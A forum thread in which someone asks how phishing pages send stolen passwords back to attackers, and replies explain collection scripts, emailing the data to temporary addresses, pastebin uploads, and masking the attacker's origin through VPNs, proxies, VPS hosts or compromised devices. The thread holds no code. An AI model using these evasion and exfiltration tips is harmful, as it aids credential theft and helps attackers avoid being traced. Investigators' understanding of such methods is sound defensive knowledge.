In phishing attacks, how does the data get sent back to the hacker?

So the malicious java script catches the user password and sends it to the hacker. But what is the exact mechanism of that data transfer and doesn’t it leave the hacker’s network information exposed? Ie couldn’t the users ISP see where it was sent to?

Lots of ways. It’s not always collected via javascript, either.

But think about it this way, you’re entering the data on attacker controlled infrastructure. They will have some script (js, PHP, or other) that collects it.

This could be stored in a file on the server, the website could make a post (or get) request to another host in the network, or out of it.

There’s no single answer because phishing adversaries have lots of different methods that they can use.

When we investigate phishing, we always try to inspect their script to find out where or how they’re collecting the data. Sometimes this is impossible - eg if they save it to a file on the server that isn’t accessible externally, then we can’t get to it, simple as that.

In terms of a request, eg they send it to a different server with an http request - then if it’s sent in cleartext (eg not https) then yes the ISP could probably inspect it. Would they? Probably not without a police order.

yeah I was thinking more in terms of something like pyphisher on kali. It would get sent to a txt file on the kali machine. That’s why I wondered if there had to be a trace between the machine and the js code on the website that sends it. I heard hacking 101 is never send anything to your own device. I don’t want to do this myself, I’m just interested in how the mechanics work since I see so many stories of hacking this year.

Well yes, if it’s as simple as sending a txt file to a device then that could be easily tracked to the destination device.

Those sorts of tools on kali are really just used for practice or authorized pen testing.

Any hacker who knows what they’re doing would never do that - the usual techniques we see on the wild are more like- emailing the data to a temporary email address, saving it on the server to be retrieved later, uploading in encrypted format to a repository like pastebin.

It’s hard to say, because different attackers will use different techniques, but there are lots of possibilities. But you’re right on the point - a good hacker will never use their own device. The good ones compromise someone else’s device and use that.

Interesting. I am not sure how it is sent to the device, only that it gets saved in a txt that is already on the device. Would that be traceable even if the attacker used a VPN?

The ISP could be on a server in a country with strong privacy laws. Alternatively they could just email it to an untraceable email address.

But what is the exact mechanism of that data transfer and doesn’t it leave the hacker’s network information exposed? Ie couldn’t the users ISP see where it was sent to?

Yes, but if the hacker uses a VPN with port forwarding, or a proxy server, or a VPS, then the ISP will only see that IP and not the true source the attacker is using to get data off the VPS or proxy.